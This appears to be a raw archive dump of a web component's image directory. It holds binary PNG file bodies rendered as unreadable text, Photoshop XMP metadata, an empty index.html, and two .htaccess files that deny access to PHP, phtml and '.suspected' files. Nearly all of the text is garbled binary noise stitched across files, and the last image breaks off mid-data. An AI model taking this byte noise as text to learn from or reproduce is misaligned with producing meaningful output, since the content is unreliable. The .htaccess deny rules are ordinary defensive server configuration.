�n��jR���T�	�X~�q��y�U�_�s�Z�S����6�tP8?��ʺC����(�
��@�� �>��v6���Qx`j1�{����ׯĮS|�Q���98��t��R� ���ɨ���q�Nj���H�>�S-](���ۺ�]uk�z>�]z��擖����_�/�\�
G��tG��Tݦ���=�l|#@O��Ũ�H.����2orS���f|��Ή�O_~ߗƦ�3�Ɲ,�Nik�+[�B�a�	i�VƱ[�k�[dk��͌}3�E���Z{�6�y9���<�e�l���.��>3T������ʅ\�2��L��Kڠ��W)���l��)���<�s#���0Fe�[�����l8l�3Ye��>���W���?� �	�
~��݇����<e'>�!J�tE���8R��Q������v�KB�gk�ƪ�P�C������T;ڡ*q ��q��>�ۚ�T�����W��z���֭��*J#�}]3S��ϕ��E{�A1�@��\���g-xF;�KhHA7��22+w��9m���|Oل�ܵ����Ρ�?�"��C�������^���Ll�
���Qi0F���6�#��z<Z'�jg1N��<u'�,-E�֎Y�~ӊq@��D;KÃ5=�@��6UQU^�ȟ6����]���:�@@c�A„��ιSq���y�s���E�׹�}l�]��T�T#8�e4T�S�f��%����q6l�҂��;�j�x�ujB;�z�R4$��d�ORe�(ü�����ߋ��cB|?6��}
	�nܒ��V}^���t|���'Ѩ��cMo1�%���'b�W[����	��g�'���"L�0����K��w��4s���� qO,�M2�H�zʧ#�n�ށ��[0'�g�
^]���z����>�:aX�>�,Q���c&�:C��ڦ���w�J�h�7���49z9Z3*M���
u��Q��&��9����!��|���Y�,MK�N�⊊���҃�MgjS*��Ѓ�2�k��XY��	fq��6gU�Ew�:R�\���K@N�L�u5�����FC�a�aً��N>{d�
H�K:|tY���.%���<=�.�bҍ\=o"���N�%�Х�P����N�Q2w�@�b�Cs���#'�d�1��u��]����76�}ki/�L�f9�n�\�	f�B�[5�O��.���Cu��:	3��r:B���	�t6�d�>�������U�e��Y4.�fI�b���',Q��bM�y0�5c����>��|oXE<Wa„�h��c���mS���
�;X�%���k�&!�4,0�Z'��4y��0���\�*�.ӡU6�[G[��P���R
UlY7�US��О����J�mz摣{����`�|��K��$��0a�2]0��Yr��s��&�j�D��уJ�wI'����DV��:�C+[bB#�Kؼ��B�X�n�!EyW��[��%;�tx��&)9��	vQ�����S�3z��e��ETU�sٙ�53gY� K��j����η��F7�������0aM�M�f�T�ffU>����}�㩔��{��„	�l�"4�6���]]6�ˋ�;҈ �V�۞%)���w��X�%�2��l:I!W.�6��Z������]���a�w~�4�.,�kon>`6�w�U�0a��u�ܯ=v����N�.��ѐ�g}�t�	{	<e��,�>iazS��U�,+¨B���GO���%���j����U�0a�*�]@�h΄��hɄٷ�4�8�ʆ���2lrX��k�,�f�������9A��'sa
+-Be�M{���w��?��v�n��/����Mp�]�„	�hК�����h���A��!
gZ,�e��([���۫r�k��1WU5Y�J��(�!Lk9~���m?�?�g=w|�K�lp�֨�7l	�
&쒂V2\Լy�K���UTy�gQ�U	w�;.9Uu�I�=F&UU���}��T�Ҭ�.���L�v	N=9���6|�z����	�s���S���7��,�U�U�0a��>�7�dٖ+�l�,����д�u������/��W��ʧٶp-N�Xa„	�P�y���,���S�,����_����IEND�B`�images/07/.htaccess000044400000000424152434416630010043 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/07/upload.png000060400000003502152434416630010235 0ustar00�PNG


IHDRG @Ae�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:286C25B93A4B11E3B00C8A2F8775DCA9" xmpMM:DocumentID="xmp.did:286C25BA3A4B11E3B00C8A2F8775DCA9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:286C25B73A4B11E3B00C8A2F8775DCA9" stRef:documentID="xmp.did:286C25B83A4B11E3B00C8A2F8775DCA9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>;�(]�IDATx��iRa��E��� ��1�q�B�?��<�^%����#�%kEDeD��'C�,`���*�fj��^f4����ND�y9�o1^�kkk_5[[[�6�����e2o����-��ߧT*�����5ppG�S@�W���r�N�A�F�twwG��f:888H.��\.ד�n�"p�������E��V�%'CR´ݾ�����ᦏT(z�����R������'��DXA3�'�$�.���i�~_\��2�U�1
ѻ�Ir�B�N��~[�	����5�H&�7�_X �N����D"-��d�a^-_+�N��s�
��B��Y����z9�D<.��j���8��%��>,.
(r3���yn��v;��ݥl6ۖ�"�K���T��B"D ��c�zEJ1�@��]�i9:>����d�Օ���q��l���F��ellL|��r5``�W����o�ժ��t����vonn�7�+"k�zF�ު�p�C�
u�
8h�v%��,V/����)pz�2��l&��L�>�9�L��,������jG
?E^��SҒEN��$W�23=-�XҟD"Q�{�y=�z��\Oe�d*E�NO����B���#<y���Ǹ+��_{�p�Qj��Lt�G�L��y��N�y�X�x�6��ϓ�C�ӱ���cθE@� T�!�J�9�b@���(�
^�В^pZJ��8�R�kL�
���ё�Z����N�,:r�Y������v:�Q�H�)}V��`(�b�[|�c�7�\b����l"��Mw%�TӕOMM��.Cn0'B*G�YPOt��~�F��T���gF�R;Vd�z���١�K�*�'�O=�����;����N�W��"p�T^A٠�WP&�x�_A��G�mԸՊy�3IEND�B`�images/07/next.png000060400000002045152434416630007730 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FE22B85259C211E385BBFCC2CFBC267A" xmpMM:DocumentID="xmp.did:FE22B85359C211E385BBFCC2CFBC267A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE22B85059C211E385BBFCC2CFBC267A" stRef:documentID="xmp.did:FE22B85159C211E385BBFCC2CFBC267A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��XR�IDATx�b���'/g1@:��	�+���k�b�|��OA�
��q&>U12����>M,aQ ��8�4��U��6�����RN��x�Cߧ�8�������h���֩����H0ˈ�@|���Ou��H�#���|����3ѡ�x%IEND�B`�images/07/01.png000060400000002150152434416630007167 0ustar00�PNG


IHDR�]h=tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:67259BFE3A4A11E3B36EC423DEDD2AE9" xmpMM:DocumentID="xmp.did:67259BFF3A4A11E3B36EC423DEDD2AE9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:67259BFC3A4A11E3B36EC423DEDD2AE9" stRef:documentID="xmp.did:67259BFD3A4A11E3B36EC423DEDD2AE9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>7=c��IDATx��M
�0�M�?(V�/���<� �D��6�F�X(ŷ��e���}]�RJ�{C)-˒:F)�4����B�l���f�O�0t]���S!Y��q|���(��m�q4R���}#C\�Ŧ�i
9��0�[��u�$���?M���{>���<����(���5"8�������_n�� ت��]��.��	h½�?�F0�ˌ֓eY,	
0�<3V���IEND�B`�images/07/index.html000060400000000042152434416630010234 0ustar00<!DOCTYPE html><title></title>
images/07/0.png000060400000003021152434416630007104 0ustar00�PNG


IHDRN
BѦtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:DC59D6214AE711E39E76F63919F906F1" xmpMM:DocumentID="xmp.did:DC59D6224AE711E39E76F63919F906F1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DC59D61F4AE711E39E76F63919F906F1" stRef:documentID="xmp.did:DC59D6204AE711E39E76F63919F906F1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�p���IDATx���r�0E}��'�N�'�qA�
��!Y�`[K˵�����鈴�t��X�t�ZZV�����i����ɵ}^ط���kC�$N赽�d�ә�0.`��v��%1F
z-��J{~��Ab/��]&���K���C�z}$�R?$�
�v��9*@�
�䢾��zR���"�a��?���I�D�.#W@	���87��ÎK���0�խ�A�����p���˸/D��V���J&�3m�3�E��?p��Fd$R�mDŽv>]��0�a3"A�?,0��*XZ���̨6x۬:R�7�ΰ)����zy@
@�~R_a?���	é�$���{�J̷7
�]k���}4?-pY���k
Ǻg@rt���<�IůdF�l����FW�^������K��oO��s�N%�
�������[ޫ[�����=��r�̊���I�
Z�Ѵ��k���t�K��p���ɀ-V5L6߅�d����Z�J
��c��X��%{v�#X��t-6$��F�����7rЀ����)�O�̬�D�G(��x�)+�X���Z6�B�U�:{5*�@��'���Փ8mX�v:��fO���w\m{&tE*e�6D�A�Q?�7P)��IEND�B`�images/07/previous.png000060400000002154152434416630010627 0ustar00�PNG


IHDR
UEe�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FA90D80759C111E3B4D69BC3BE0FC11B" xmpMM:DocumentID="xmp.did:FA90D80859C111E3B4D69BC3BE0FC11B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FA90D80559C111E3B4D69BC3BE0FC11B" stRef:documentID="xmp.did:FA90D80659C111E3B4D69BC3BE0FC11B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڴԭ
�P��m.�i�
lZ�=�~%����v�`�hj�4�y&� X48��38X;�_xV8{y� ,������Zf&����D��<��AW�oݥ6ʨ��*"7E�\ͅ�x��(I�&�l]S�-\QT���1���d#��v����FJ��a�NJ6R^���쥜5Q�)lE^�㠽4*��(�7)�i�Cg��b�9��8l���IEND�B`�images/.htaccess000044400000000424152434416630007615 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/duplicate_hover.png000060400000003211152434416630011675 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6DF174D68F7C11E5A93BCE1BD0A62FA9" xmpMM:InstanceID="xmp.iid:6DF174D58F7C11E5A93BCE1BD0A62FA9" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�qX�IDATx�b���L@�`����b}�����Ĉ�e�Zh�X��3	���e������`���3T��f$�d�@�&����0������?��7�,W�vF�П� y.��p�/��>��-~�Y��o�t����� t��>���
,Hl�/��,�0����Ys�)3�C�@����L��ac�R�����f؎CO�012�2��������������?/�3KPa9�r��q�����ǟ��~�ab`Dw
P�·�sݍ$�9�����('�?��f���s[�ճ/߁��/?t��}���F&`�2��`,!���pfBV&(��l1Loǟ��������13�����t��	N`�N�x����n����8��Q���
 ���n�?��H��4Ca8v��5ԅR�2��w���+�O�#+B�2T�M��>�&H4�dJl��?����z�G�9ZQ�S(�.A�欢A]�0]�^��
a���Y.���dz��7]�����l�;/eϱ��4�wC/K��#P4��ˣ}H��>593�.�F�����N�����贜��4	Pb��dI8/$�clՒLM86W�R��R-��a�(j.�la1.�X�t����������@�����q�/���{Mգ֪`&vm����]ɸ>��/��2��� �X����7���}����~�ҥF*IEND�B`�images/customHTML.png000060400000005611152434416630010525 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:DAB0B46FC7F511E4933AE41B8B3DD0C5" xmpMM:DocumentID="xmp.did:DAB0B470C7F511E4933AE41B8B3DD0C5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DAB0B46DC7F511E4933AE41B8B3DD0C5" stRef:documentID="xmp.did:DAB0B46EC7F511E4933AE41B8B3DD0C5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATx��Y
P�u��˗(��bBJ��Z&i�iI��H�9�݌W��57w�\W���46�����^&ZҐR�� ���-ߊ�.������8v�����������+�[Q���P�;��p��#���	Y���>L&����BH#$���'�#|J8B��`��_�L��p��D��g��&T�dz�<�
5O�>B0&Bd��l/��<��&��\@X�{!N�X�n!�T��b���s�{*Iʒ��5KQw�ڞ.G�u�B�]}F(�?H%�:��Rl�"nJ>xz~���JM
�����$h{��S�h��#�I�F�NJ�z��z:n���t���L�ovvJ���W�G�)�l���5?�3}=��o$l��V%2�q�M�.�� ��=gb
��,�J'6D?��K��I�"rj��)qC��^||����s���D:5O���g���7��$yME�(��Kp[�6R4�G����sÉr�9F��T�V}�KC�n��[�~���2
���R1*>C��v(ї��pa��x.�L_����e�;&)�R��*
>);���iI����3棻׀�|�=���
4E��~w�3O$���V�s�bk���Q����K�S�[�>Ij����'�	g�[�'g��U�3�I.�~ p,�,G�W�/V2�ǥܹd�||�q'^�]c�܀0<�?-�;8]~A����ϿG��{H����!�m��Q��pl�]�����I*j*��l�e�B���/N^;�궆��|�����|_��C��~4�b!:c���&O�K�^������o�źbWgY]����yb�tE�Mֶ7�_൸��+~�
1��Pa�gR��l��B6�~]9��a���y�c}�
�3}NJ�n�Gq��L���j��(dn������i(��9T�?!�[�Xh�����/}�ײQOՖ͔��
[$�E>��)7�E���D�PQ�@sg�]�%�ʱ�f���A�W��������-)u��
��y�s|v��JN�D;����?�[��N�wv/_�@c��M���O�
�%��ks�
Ϙ��-ق�B�وXbM�5J�In^1��h�)�N�.���8�y6����U׎�����y#��v�_
d˜h�)���&
=������:�}d�@*R��/�w�.�(�yڟ�+����,��v	�;�"%r96>�J��]v:��Oҭo�3���3�k�3OK~])��dR�	�O��k�)X5'G����c��0��V�O��dW棻�`3$�N�/�_6*��E���9|�{9՗lg�n#�u�Jv���]��HWg#�"��������h�p�m;�y���v�kmN��(�oz�Y�τ.�,$��-��Dc��L4[X���;�.� {2��Ԙ��=9X�m��6���Z�$K�K��Hh0����JN�Լ����q���D	������
�T����Y���L"�2O��c/�n�p�W���n�(kDc1J�n[��\J�j��1uK�;�q���]3\��}ڒڶFl;�c�ޖ��ٻ���z-U������9�NW��^6+NTSW�8��Zc�z�w�$��&���I[�Cw��w��`g��Xa��Gt
��ص�>����e^t�Q܈����|�N#>5įu�r�D$S�Ww_Irʼp�m"�����$�A.�ss��/4Q��#roU�v���<������-��8Z}�i��q���j
�ı��$k�Y���s��~�;n;rWMch�$�Ľ�{H�5�o�Pe��d��F���.Tu&���#�V��
8R�)�8;$5r-dq��_�sՋ6w0�+��>ľ�V�+�
"�9rU�W���X�STkiu
�_E�"��8y�9�7ٲ��ey����Gt0f{%��9�"E0��A4�U��u�z��\
�{�pU�u{���iQC�u����V��[��^�ʬe'�`|[�6C'�gT`��Q�`�A&�ԴIEND�B`�images/time_and_date.png000060400000005115152434416630011302 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:FAB7918CC7F511E496F8C4B060682565" xmpMM:DocumentID="xmp.did:FAB7918DC7F511E496F8C4B060682565"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FAB7918AC7F511E496F8C4B060682565" stRef:documentID="xmp.did:FAB7918BC7F511E496F8C4B060682565"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�‚��IDATx��Y{PTe�������'��8b:hP3�`i�nd5�hGǙ�#c�r�ʩ�4S�jF�H���DE��� � Ȫ,�k�ew�n���E93��ν�����d�*z�0ZSHg�Ɛ�&
$
%m"5�V����"=�_��n'�!8�o�.&�	� ��8H��.���,'��+��*�N(U'�z=�I��To`����!Qh�����sӨ��������w��
̥�H98KȒ�[�
@�ˇ6x������#�4�Fp7��(Ufh�b�_}ݦ�r��`kӠ�OB�N5`b����P�a%�a5��J��OV\2
�d�L��J����^��`n�S�k&F���ja�����Z@����q�,�4����|��{��vR,��	}&2����Ѕh=r��u:� �݌�����`��0&b������V�|�	�\.C��*�]WMX�#gʮ{�e���ĉ��=]/V�+ēQb�<*'7�Œ�Q�.��  5a�W��+G�͎�S<�9[~�Vm���NFC��������܋�	{䷏ve��]�ɪ�Y!c�,ۼ6�'�E�
� C̴�;����ho�Yqވ��Ջ�]V����jw@�Tz��n�/��J�V�%�=�.�8P�6:QR�Å��U��h�������3��V�)c0.rhw��I�k��g&�]��C�T�H�e���Ov�>.��#��`�3��:��5\.���̯~DރՅNbÀ��~R���a�CQ�Ԃ��}q��PhԨ��@�收�J=�h4�^�a�>
�0|PԘ�b�\|�/��tX�r^I����&m�4�����,��J~tI����;]v
+Ғ�>}��
1r�`�{+���*r?*�<��2-!�s���ɲ���q#06"��(�Z���c���_L��Jve@��d�H
�ߛ��c�9����T�Q�r��R,MM��)�+�x��*/?1ʤ���4D���j�~PH��M}�� 9Pg+�{�uH��&s������cx!>�)��	@��V��FR�O��Z�{��L4je���*Ygo̓B�������p0c9�G�%R����(�O�J

m�ʯJFMt�m�1(Ք������m:p/M�ěYyE�:;e��DCP�̡�[u�m�v���r��(�L]�����MsW�ҩ�fɳ���>N����#�+wK��y�����+�*�ϰXd��+a�p�w#/�L��&쑎����3��Hoϔ��ƂY�r�:�"2�$�Q|N�2�w�v��F9DW&�S袌w�X��[�<-&[���CIo08s�	d>�a/rK|Lr�
8�g]���Χж��t�����"r~��P�a���Mմ���,�/��̫E���'Pl9t�SIu�L�jע��]W���]��N��:�f�w��n��]��������b�&ӷ8��F���]�ؑM�FM�2#K��z�1�P��$y[��9�:`�B9��A
�RT������Ռ��M�;dp���WB��O0�o݌h��
�����I��n�G�,A��R#�kt���M��Qt�0�-�/4>.���|�����x���ґDk:��@�;3u��\
��*jՊQSv7+L�l6����ɦ�����i�*w'���(�����Ϩ�����ɡ��A	IEND�B`�images/checkbox.png000060400000004637152434416630010323 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E6C93206C7F511E4AE4297BA7ECE7762" xmpMM:DocumentID="xmp.did:E6C93207C7F511E4AE4297BA7ECE7762"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E6C93204C7F511E4AE4297BA7ECE7762" stRef:documentID="xmp.did:E6C93205C7F511E4AE4297BA7ECE7762"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>eNVIDATx�ę{lSUǿ��c�l�Q��T&� >�QC�GQ�DHO��a�a"�0��0! H������{�-l�nm��u�w.wc�[{���/�����{�����F��@z��i")��&
#u�,�R%��4�%�
'}LZL�M����p^&��t�+��ϋžHF� U�~!��'$�.�d?n��C�˅%B����
C���	L.�F.G������e�\Lz!�p�Q�XlX�W���h�Шw�j%�MX�j�6|(H�
�Ʀ6=�������`�1X�m�21�H���'=zvL<�b�7P��4��(�&� �
(]��4ꇌĈ��1v���w]�D��,>N<@Y�Y��#UI3�K<��1$$-AG�Eug��I����Y|�v�/U2�fCT$�~��Y��<y+�����aj/���p$|����?�/
��F�<	�!��E:�Et�QY�	L��^��^�K���v:�4+T��bgB3q-bF�ňqO{u7W��~��QjL}?3��@��`��ްH
�L$�|
E����:M9p��E73s:�i���RC��N��?���q=h,�m�t���Le)��>��a�ѐ���28�V��6�
�Ľ��)ۡ�J����*��G�����q��8����j��t�w|�����6�Y���~�j~���䖀G'"�tP*�����
W)B3�@赞n:��ڴ�ۇ<���O9a���k-�;�X���5!h�z���=ZO�]c��D��x��xf�o�>���|2�
R�zu���\��@���?�@7t���rt�]p�_��3i3����y��'�R����a�RS�EwgЁIK+{�\X1hvk�.���Գ�(�bҴ��4���������
vK�$�V,�9����U���
��{V���s��r�G�ƺ��*������٨;���u>5�N��~��9�lA�e��<�Ұ�/�����ϗ,;Hi�[PBe�ĉy���[�o=����=4�$u��:�+t�d���B1O�,u�S�7�WS�A�	�Ŋ�'������J�2ݝ�4��i��l�ZM�27=w��Y�AJZ1w�n����x�>H�p�%g��i[����,Gl#F�9� �Nݼ�@���F>���wT�v�8y�iVS�eV#_*�6�
����;K64�\��a�0,$�ʶY���.�-�����+��"�:��f�`U6;V�IWm�G(�I���o`Ӂ#�g��떎Z�&36���`3�J�۳��$�6Qo�}n�EG�V9b�=Y]��e��NJADo;�� ���J�Yk(	Y�Wn`��,� [��e��E%�M~{+��e�X���ϗ
�A�e6�y�و�UuXǒ�T�f6�]�����`i� �^71��W���m�d
>���?�\T���/ۘ�B2o韂$e&�Ű�Y/!}t��UH���Xʿ**jʅ�{v;���܊��Fѩ�<�Y(���dЇ�Å�!+��X/����E��� 3�	F �_��Q"��IEND�B`�images/delete.png000060400000043217152434416630007774 0ustar00�PNG


IHDR�oH�	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
